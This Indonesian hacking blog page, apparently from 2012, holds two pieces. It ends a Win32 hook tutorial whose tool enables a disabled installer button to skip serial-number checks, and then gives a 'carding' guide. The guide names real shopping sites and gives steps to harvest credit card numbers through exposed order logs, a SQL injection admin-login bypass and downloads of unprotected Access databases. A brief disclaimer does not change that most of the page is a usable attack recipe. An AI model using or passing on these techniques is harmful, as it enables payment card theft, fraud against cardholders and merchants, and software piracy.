HHOOK hhk // handle of hook procedure to remove
);


Proof of Concept
Jalankan program Enable Hook, Anda akan melihat icon kecil di tray icon dengan caption “MRHPx Enable Hook OFF”. Program Enable Hook ini telah diuji pada beberapa aplikasi yang menggunakan proteksi Password maupun Serial Number pada saat installasi, salah satunya adalah DigiFish AncientOcean v1.01. Tanpa Serial Number yang benar Anda tidak akan dapat melakukan installasi program karena tombol “Next” dalam status disable (Screen. 1)

Screen 1
Setelah itu coba Anda klik kiri dengan mouse, program Enable Hook yang berada di tray icon sampai
icon dan statusnya berubah menjadi ON (Screen. 2). Tanda berarti OFF, dan tanda berarti ON. Lalu coba klik tombol “Next” disable yang berada di jendela installasi program tadi. Bagaimana? Statusnya berubah menjadi Enable dan bisa di klik dengan mouse bukan?


Screen 2


Kesimpulan
Mengapa tombol “Next” yang semula disable berubah menjadi enable? Padahal Serial Number masih kosong, tidak diisi sama sekali? Jawabannya adalah karena di dalam “Handles and Objects” sebuah aplikasi bisa meraih Obyek-Jendela handle yang ada. Sama halnya dengan Anda tidak perlu mengganti channel TV manual, sampai harus jalan bolak-balik dari tempat duduk Anda ke meja TV jika sudah ada remote control di tangan Anda. Jadi meskipun diisi Password dan Serial Number yang benar ataupun tidak benar sekalipun, installasi akan tetap berjalan lancar. Sampai disini, Anda sudah melihat kehebatan Win32 Hook bukan. Jadi jangan pernah menganggap remeh Win32 APIs Hook sebelum mempelajarinya. Bahkan proteksi FLEXlm yang terkenal itupun takluk karena hal ini. Untuk para developer, apakah masih yakin proteksi program installer Anda ini benar-benar aman?? Silahkan berkreasi dan berekspresi dengan Win32 APIs. Terima kasih semoga bermanfaat.


Download link klik disini

Sumber :
www.Binushacker.net
www.jasakom.com
www.ozcorp.blogspot.com

Selasa, Agustus 28, 2012

Carding archived

Assalamu`alaikum Wr.Wb.

     Sekarang saya akan mencoba share sedikit tentang carding untuk yang baru mau mengenal dunia carding. Mohon di abaikan bagi master-master carding di luar sana,yang pastinya sangat mahir dalam melakukan carding ini.
     Saya harap ini jangan digunakan untuk hal-hal yang merugikan orang lain karena kegiatan ini tergolong tindak kejahatan, oleh karena itu. Sebaiknya ini di jadikan pengetahuan semata dan di gunakan untuk para calon administrator web shopping cart agar lebih teliti dan safety dalam mengelola database,log,dan web itu sendiri.

Ok Lets begin >>>>>

1. CGI store Log

     Disini kamu harus usaha sendiri untuk mencari target yang akan kamu pakai cc nya.
Coba gunakan ini:

A. http://www.chaswells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
B. And then delete Repair_Manuals.htm in url/browsing  sehingga menjadi http://www.chaswells.com/cgi-bin/store/index.cgi?page=
C. Input file is behind the web :
.../admin/files/order.log
for example : http://www.cashwells.com/cgi-bin/store/index.cgi?page=admin/file/order.log
D. So that comes out from the site is number cc (credit card).

2.   Admin Take Over

Same as above you must try yourself to find the target.
This should be done:

A. http://www.partsupply.in.th/shopadmin.asp
B. And then next use sql injection techniques
     user : 'or"='
     pass : 'or"='
C. Trus kamu buka file" yang ada disana satu persatu. Dapat deh no CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. TApi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. coba cari lagi target yang lain.

3. Database Downloadable

Same as above you must try yourself to find the target.
This should be done:

A. http://www.youngsliquors.com/winestore/shopadmin.asp
B. And then next delete shopadmin.asp in url/browsing so be http://www.youngsliquors.com/winestore/
C. Input file is behind the web:
     shopdbtest.asp
     for example : http://www.youngsliquors.com/winestore/shopdbtest.asp
 D. And then look the name database and the place : xDatabase and xDblocation
    example:
    xDatabase : shopping300
    xDatabase :..../.../../.../www.youngsliquors/5498761211
E. Sekarang untuk mendownload file shopping300 dapat dilakukan dengan merubah url/browsing nya menjadi:
     http://www.youngsliquors.com/winestore/shopping300.mdb
F. Kalo sudah di download, buka file shopping300.mdb dengan ms.Access.

4. Metacart

Same as above you must try yourself to find the target.
This should be done:

A. http://www.imagexpres.com/metacart/moreinfo.asp
B. And then next delete moreinfo.asp in url/browsing so be http://www.imagexpres.com/metacart/
C. Input file is behind the web ;
     database/metacart.mdb
     example : http://www.imagexpres.com/metacart/database/metacart.mdb
D. Kalo sudah di download, buka file metacart.mdb dengan ms.access

5. PDshopPro Shopping Cart

Same as above you must try yourself to find the target.
This should be done:

A. http://www.marktwainbooks.com/shop/category.asp?catid=4
B. And then next delete shop/category.asp?catid=4 in url/browsing so be http://www.marktwainbooks.com
C. Input file is behind the web:
     admin/dbsetup.asp
     example : http://www.marktwainbooks.com/admin/dbsetup.asp
D. Maka yang keluar dari situs itu adalah:
     Your Database Type:
     Microsoft Access
     Your Connection String :
     Driver={Microsoft Access Driver(*.mdb)};DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
     Current Status :
     Connection to Database OK.
     Database Primary 'setup' Table Found!
     Database Permissions OK!
E. Sekarang untuk mendownload file pdshoppro.mdb dapat dilakukan dengan merubah url/browsing nya menjadi:
     http://www.marktwainbooks.com/data/pdshoppro.mdb
F. Kalo sudah di download, buka file pdshoppro.mdb dengan Ms.Access.

Ok,itu sebagian cara untuk teknik mencari data CC target.

----------------------------------------------------------------------------------------------
Ini hanya sebuah informasi yang perlu anda ketahui.
Semoga bermanfaat.
----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------